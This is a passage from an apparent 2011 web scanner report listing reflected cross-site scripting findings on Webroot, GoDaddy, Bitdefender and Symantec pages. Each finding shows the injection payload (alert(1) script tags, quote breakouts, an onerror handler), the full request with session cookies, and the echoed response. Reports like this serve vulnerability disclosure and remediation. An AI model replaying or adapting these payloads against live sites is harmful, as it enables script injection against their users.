Cookie: s_lv=1303045247220; WRSID=53806c0679aadc2e5c9ced35171f7aa7; __utmz=43535610.1303044931.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; RCID=P_RC%3D%3E99999%3AP_AC%3D%3E%3AP_RSC%3D%3E; mbox=session#1303044923199-20205#1303047100|PC#1303044923199-20205.17#1318856440|check#true#1303045300; s_vnum=1305636930736%26vn%3D1; s_invisit=true; s_cc=true; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1303045247_PCT-1303045247_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_vi=[CS]v1|26D571A185013486-400001026021711E[CE]; s_nr=1303045247207; __utma=43535610.2084358374.1303044931.1303044931.1303044931.1; __utmc=43535610; __utmb=43535610.2.10.1303044931;

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 13:12:03 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 22140


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">


<
...[SNIP]...
="text/javascript">
$(function() {    
/* jquery should be wrapped in document ready function */                        
               
$("#resourcesLinks ul li a[href='/En_US/case-study/saas-technology-cloud-computing.html?7bafe"-alert(1)-"9761630f095=1']").css("font-weight", "bold");
});
</script>
...[SNIP]...

4.215. http://www.webroot.com/En_US/case-study/web-email-security-TTCU.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.webroot.com
Path:   /En_US/case-study/web-email-security-TTCU.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5364"><script>alert(1)</script>5d3b3a60c04 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /En_US/case-study/web-email-security-TTCU.html?b5364"><script>alert(1)</script>5d3b3a60c04=1 HTTP/1.1
Host: www.webroot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1303045247220; WRSID=53806c0679aadc2e5c9ced35171f7aa7; __utmz=43535610.1303044931.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; RCID=P_RC%3D%3E99999%3AP_AC%3D%3E%3AP_RSC%3D%3E; mbox=session#1303044923199-20205#1303047100|PC#1303044923199-20205.17#1318856440|check#true#1303045300; s_vnum=1305636930736%26vn%3D1; s_invisit=true; s_cc=true; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1303045247_PCT-1303045247_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_vi=[CS]v1|26D571A185013486-400001026021711E[CE]; s_nr=1303045247207; __utma=43535610.2084358374.1303044931.1303044931.1303044931.1; __utmc=43535610; __utmb=43535610.2.10.1303044931;

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 13:12:01 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 22050


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">


<
...[SNIP]...
<link rel="canonical" href="http:///En_US/case-study/web-email-security-TTCU.html?b5364"><script>alert(1)</script>5d3b3a60c04=1" />
...[SNIP]...

4.216. http://www.webroot.com/En_US/case-study/web-email-security-TTCU.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.webroot.com
Path:   /En_US/case-study/web-email-security-TTCU.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 888fb"-alert(1)-"36b8ce0e9e3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /En_US/case-study/web-email-security-TTCU.html?888fb"-alert(1)-"36b8ce0e9e3=1 HTTP/1.1
Host: www.webroot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1303045247220; WRSID=53806c0679aadc2e5c9ced35171f7aa7; __utmz=43535610.1303044931.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; RCID=P_RC%3D%3E99999%3AP_AC%3D%3E%3AP_RSC%3D%3E; mbox=session#1303044923199-20205#1303047100|PC#1303044923199-20205.17#1318856440|check#true#1303045300; s_vnum=1305636930736%26vn%3D1; s_invisit=true; s_cc=true; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1303045247_PCT-1303045247_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_vi=[CS]v1|26D571A185013486-400001026021711E[CE]; s_nr=1303045247207; __utma=43535610.2084358374.1303044931.1303044931.1303044931.1; __utmc=43535610; __utmb=43535610.2.10.1303044931;

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 13:12:02 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 22021


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">


<
...[SNIP]...
ipt type="text/javascript">
$(function() {    
/* jquery should be wrapped in document ready function */                        
               
$("#resourcesLinks ul li a[href='/En_US/case-study/web-email-security-TTCU.html?888fb"-alert(1)-"36b8ce0e9e3=1']").css("font-weight", "bold");
});
</script>
...[SNIP]...

4.217. http://www.webroot.com/En_US/case-study/web-security-supreme-court-georgia.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.webroot.com
Path:   /En_US/case-study/web-security-supreme-court-georgia.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4995b"-alert(1)-"73faef56208 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /En_US/case-study/web-security-supreme-court-georgia.html?4995b"-alert(1)-"73faef56208=1 HTTP/1.1
Host: www.webroot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1303045247220; WRSID=53806c0679aadc2e5c9ced35171f7aa7; __utmz=43535610.1303044931.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; RCID=P_RC%3D%3E99999%3AP_AC%3D%3E%3AP_RSC%3D%3E; mbox=session#1303044923199-20205#1303047100|PC#1303044923199-20205.17#1318856440|check#true#1303045300; s_vnum=1305636930736%26vn%3D1; s_invisit=true; s_cc=true; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1303045247_PCT-1303045247_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_vi=[CS]v1|26D571A185013486-400001026021711E[CE]; s_nr=1303045247207; __utma=43535610.2084358374.1303044931.1303044931.1303044931.1; __utmc=43535610; __utmb=43535610.2.10.1303044931;

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 13:11:45 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 21601


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">


<
...[SNIP]...
ext/javascript">
$(function() {    
/* jquery should be wrapped in document ready function */                        
               
$("#resourcesLinks ul li a[href='/En_US/case-study/web-security-supreme-court-georgia.html?4995b"-alert(1)-"73faef56208=1']").css("font-weight", "bold");
});
</script>
...[SNIP]...

4.218. http://www.webroot.com/En_US/case-study/web-security-supreme-court-georgia.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.webroot.com
Path:   /En_US/case-study/web-security-supreme-court-georgia.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c09b7"><script>alert(1)</script>4c5e9a3937 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /En_US/case-study/web-security-supreme-court-georgia.html?c09b7"><script>alert(1)</script>4c5e9a3937=1 HTTP/1.1
Host: www.webroot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1303045247220; WRSID=53806c0679aadc2e5c9ced35171f7aa7; __utmz=43535610.1303044931.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; RCID=P_RC%3D%3E99999%3AP_AC%3D%3E%3AP_RSC%3D%3E; mbox=session#1303044923199-20205#1303047100|PC#1303044923199-20205.17#1318856440|check#true#1303045300; s_vnum=1305636930736%26vn%3D1; s_invisit=true; s_cc=true; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1303045247_PCT-1303045247_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_vi=[CS]v1|26D571A185013486-400001026021711E[CE]; s_nr=1303045247207; __utma=43535610.2084358374.1303044931.1303044931.1303044931.1; __utmc=43535610; __utmb=43535610.2.10.1303044931;

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 13:11:44 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 21629


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">


<
...[SNIP]...
<link rel="canonical" href="http:///En_US/case-study/web-security-supreme-court-georgia.html?c09b7"><script>alert(1)</script>4c5e9a3937=1" />
...[SNIP]...

4.219. http://www.webroot.com/En_US/case-study/web-security-toshiba.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.webroot.com
Path:   /En_US/case-study/web-security-toshiba.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c9662"-alert(1)-"bbfc101f977 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /En_US/case-study/web-security-toshiba.html?c9662"-alert(1)-"bbfc101f977=1 HTTP/1.1
Host: www.webroot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1303045247220; WRSID=53806c0679aadc2e5c9ced35171f7aa7; __utmz=43535610.1303044931.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; RCID=P_RC%3D%3E99999%3AP_AC%3D%3E%3AP_RSC%3D%3E; mbox=session#1303044923199-20205#1303047100|PC#1303044923199-20205.17#1318856440|check#true#1303045300; s_vnum=1305636930736%26vn%3D1; s_invisit=true; s_cc=true; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1303045247_PCT-1303045247_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_vi=[CS]v1|26D571A185013486-400001026021711E[CE]; s_nr=1303045247207; __utma=43535610.2084358374.1303044931.1303044931.1303044931.1; __utmc=43535610; __utmb=43535610.2.10.1303044931;

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 13:11:50 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 22201


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">


<
...[SNIP]...
script type="text/javascript">
$(function() {    
/* jquery should be wrapped in document ready function */                        
               
$("#resourcesLinks ul li a[href='/En_US/case-study/web-security-toshiba.html?c9662"-alert(1)-"bbfc101f977=1']").css("font-weight", "bold");
});
</script>
...[SNIP]...

4.220. http://www.webroot.com/En_US/case-study/web-security-toshiba.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.webroot.com
Path:   /En_US/case-study/web-security-toshiba.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17a07"><script>alert(1)</script>f734556fb19 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /En_US/case-study/web-security-toshiba.html?17a07"><script>alert(1)</script>f734556fb19=1 HTTP/1.1
Host: www.webroot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1303045247220; WRSID=53806c0679aadc2e5c9ced35171f7aa7; __utmz=43535610.1303044931.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; RCID=P_RC%3D%3E99999%3AP_AC%3D%3E%3AP_RSC%3D%3E; mbox=session#1303044923199-20205#1303047100|PC#1303044923199-20205.17#1318856440|check#true#1303045300; s_vnum=1305636930736%26vn%3D1; s_invisit=true; s_cc=true; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1303045247_PCT-1303045247_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_vi=[CS]v1|26D571A185013486-400001026021711E[CE]; s_nr=1303045247207; __utma=43535610.2084358374.1303044931.1303044931.1303044931.1; __utmc=43535610; __utmb=43535610.2.10.1303044931;

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 13:11:49 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 22231


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">


<
...[SNIP]...
<link rel="canonical" href="http:///En_US/case-study/web-security-toshiba.html?17a07"><script>alert(1)</script>f734556fb19=1" />
...[SNIP]...

4.221. http://www.webroot.com/download/trial/WRInstallSnr_0.exe [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.webroot.com
Path:   /download/trial/WRInstallSnr_0.exe

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 128fc<img%20src%3da%20onerror%3dalert(1)>d0f95acf3b5 was submitted in the REST URL parameter 3. This input was echoed as 128fc<img src=a onerror=alert(1)>d0f95acf3b5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /download/trial/128fc<img%20src%3da%20onerror%3dalert(1)>d0f95acf3b5?bjpc=64021&vcode=DT02A&rc=%3C?php%20echo%20$rc_code;%20?%3E HTTP/1.1
Host: www.webroot.com
Proxy-Connection: keep-alive
Referer: http://www.webroot.com/En_US/land-ss-promo-freescan.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WRSID=53806c0679aadc2e5c9ced35171f7aa7; RCID=P_RC%3D%3E99999%3AP_AC%3D%3E%3AP_RSC%3D%3E; mbox=check#true#1303044984|session#1303044923199-20205#1303046784|PC#1303044923199-20205.17#1318856127; s_nr=1303044930733; s_lv=1303044930735; s_lv_s=First%20Visit; s_vnum=1305636930736%26vn%3D1; s_invisit=true; s_cc=true; __utmz=43535610.1303044931.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=43535610.2084358374.1303044931.1303044931.1303044931.1; __utmc=43535610; __utmb=43535610.1.10.1303044931; s_vi=[CS]v1|26D571A185013486-400001026021711E[CE]; s_sq=webrootglobalprod%2Cwebrootprod%3D%2526pid%253DEn_US%252520%25257C%252520Consumer%252520%25257C%252520Landing%252520%25257C%252520Land-ss-promo-freescan%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.webroot.com%25252Fshoppingcart%25252Ftryme.php%25253Fbjpc%25253D64021%252526vcode%25253DDT02A%252526rc%25253D%2525253C%25253Fphp%25252520echo%25252520%252524rc_code%25253B%2525252%2526ot%253DA

Response

HTTP/1.1 404 File Not Found
Date: Sun, 17 Apr 2011 13:03:30 GMT
Server: Apache
Content-Length: 66
Content-Type: text/html

<h1>404 Not Found</h1>128fc<img src=a onerror=alert(1)>d0f95acf3b5

4.222. https://auctions.godaddy.com/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   https://auctions.godaddy.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload dbffc--><script>alert(1)</script>cfbb479af99 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: auctions.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=dbffc--><script>alert(1)</script>cfbb479af99

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 253079
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=apupmevv1bo5rs3zqbtipbnx; path=/; HttpOnly
Set-Cookie: traffic=cookies=1&referrer=http://www.google.com/search?hl=en&q=dbffc--><script>alert(1)</script>cfbb479af99&sitename=auctions.godaddy.com&page=/trpHome.aspx&server=M1PWTDNAMWEB004&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=173.193.214.243&referringpath=; domain=godaddy.com; path=/
X-Powered-By: ASP.NET
Date: Sat, 16 Apr 2011 14:00:24 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
   <head id="ctl00_Head1"><tit
...[SNIP]...
<!-- WEB004 [1] http://www.google.com/search?hl=en&q=dbffc--><script>alert(1)</script>cfbb479af99 [2] False [3] [4] [5] [6] [7] apupmevv1bo5rs3zqbtipbnx [8] [9] -2 [10] False -->
...[SNIP]...

4.223. https://myaccount.bitdefender.com/site/MyAccount/login/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   https://myaccount.bitdefender.com
Path:   /site/MyAccount/login/

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 190db"><script>alert(1)</script>8ce41158f11 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /site/MyAccount/login/ HTTP/1.1
Host: myaccount.bitdefender.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _country=us; s_vi=[CS]v1|26D5718A851D098B-40000144C01B87EA[CE]; s_cc=true; s_sq=%5B%5BB%5D%5D
Referer: 190db"><script>alert(1)</script>8ce41158f11

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 12:53:15 GMT
Server: Apache
Set-Cookie: PHPSESSID=nffhfnfpnkruua6ffqj0uj2s43; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=3, max=150
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 17612

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>MyAccount - Login</title>


<m
...[SNIP]...
<form name="loginForm" action="https://myaccount.bitdefender.com/site/MyAccount/login?redirect=190db"><script>alert(1)</script>8ce41158f11" method="POST" OnSubmit="return MyAccount.formCheckLogin(this);">
...[SNIP]...

4.224. http://security.symantec.com/sscv6/getbrowser.asp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://security.symantec.com
Path:   /sscv6/getbrowser.asp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8d426'-alert(1)-'dcc4deed985 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /sscv6/getbrowser.asp HTTP/1.1
Host: security.symantec.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; bhPrevResults=bhjs=1&bhrf=http%3A%2F%2Fsecurity%2Esymantec%2Ecom%2Fsscv6%2FWelcomePage%2Easp; ASPSESSIONIDACBQSBBB=HLNNLMBEJCMEKFMOAHHDCMDL; s_vi=[CS]v1|26D5719C05013AA6-600001004018FC8E[CE]; s_sq=symanteccom%3D%2526pid%253Die%25253A%252520security%252520check%25253A%252520welcomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//security.symantec.com/sscv6/home.asp%25253Flangid%25253Die%252526venid%25253Dsym%252526close_parent%25253Dtrue%2526ot%253DA; bhResults=; bhCookieSess=; bhCookieSaveSess=1;
Referer: http://www.google.com/search?hl=en&q=8d426'-alert(1)-'dcc4deed985

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 13:04:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
pics-label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" labels on "2000.01.31T17:50-0800" until "2004.05.31T17:50-0800" r (n 0 s 0 v 0 l 0))
Content-Length: 11575
Content-Type: text/html
Expires: Sun, 17 Apr 2011 13:03:04 GMT
Cache-control: private


<html>
<head>
<META HTTP-EQUIV = "Pragma" CONTENT="no-cache">

<link rel="stylesheet" href="sharedcontent/common/css/symantec.css" type="text/css">

<title>Symantec Security
...[SNIP]...
nknown_country";

   var lang = 'ie';

   var vendor = 'sym';

   var region = getRegion();

   var title = ': security check: get browser';

   var strReferrer = 'http://www.google.com/search?hl=en&q=8d426'-alert(1)-'dcc4deed985';

/* Give the campaign page a new title depending on referrer */
   if (title.indexOf("campaign") != -1) {
       if (strReferrer.indexOf("security_solutions.asp") != -1)
           title = ": security check:
...[SNIP]...

4.225. http://security.symantec.com/sscv6/getbrowser.asp [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://security.symantec.com
Path:   /sscv6/getbrowser.asp

Issue detail

The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload a69f8<script>alert(1)</script>6baef5bbea5 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /sscv6/getbrowser.asp HTTP/1.1
Host: security.symantec.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)a69f8<script>alert(1)</script>6baef5bbea5
Connection: close
Cookie: s_cc=true; bhPrevResults=bhjs=1&bhrf=http%3A%2F%2Fsecurity%2Esymantec%2Ecom%2Fsscv6%2FWelcomePage%2Easp; ASPSESSIONIDACBQSBBB=HLNNLMBEJCMEKFMOAHHDCMDL; s_vi=[CS]v1|26D5719C05013AA6-600001004018FC8E[CE]; s_sq=symanteccom%3D%2526pid%253Die%25253A%252520security%252520check%25253A%252520welcomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//security.symantec.com/sscv6/home.asp%25253Flangid%25253Die%252526venid%25253Dsym%252526close_parent%25253Dtrue%2526ot%253DA; bhResults=; bhCookieSess=; bhCookieSaveSess=1;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 13:04:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
pics-label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" labels on "2000.01.31T17:50-0800" until "2004.05.31T17:50-0800" r (n 0 s 0 v 0 l 0))
Content-Length: 11551
Content-Type: text/html
Expires: Sun, 17 Apr 2011 13:03:02 GMT
Cache-control: private


<html>
<head>
<META HTTP-EQUIV = "Pragma" CONTENT="no-cache">

<link rel="stylesheet" href="sharedcontent/common/css/symantec.css" type="text/css">

<title>Symantec Security
...[SNIP]...
<i>Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)a69f8<script>alert(1)</script>6baef5bbea5</i>
...[SNIP]...

4.226. http://security.symantec.com/sscv6/help.asp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://security.symantec.com
Path:   /sscv6/help.asp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 638d3'-alert(1)-'fbef2f3541b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

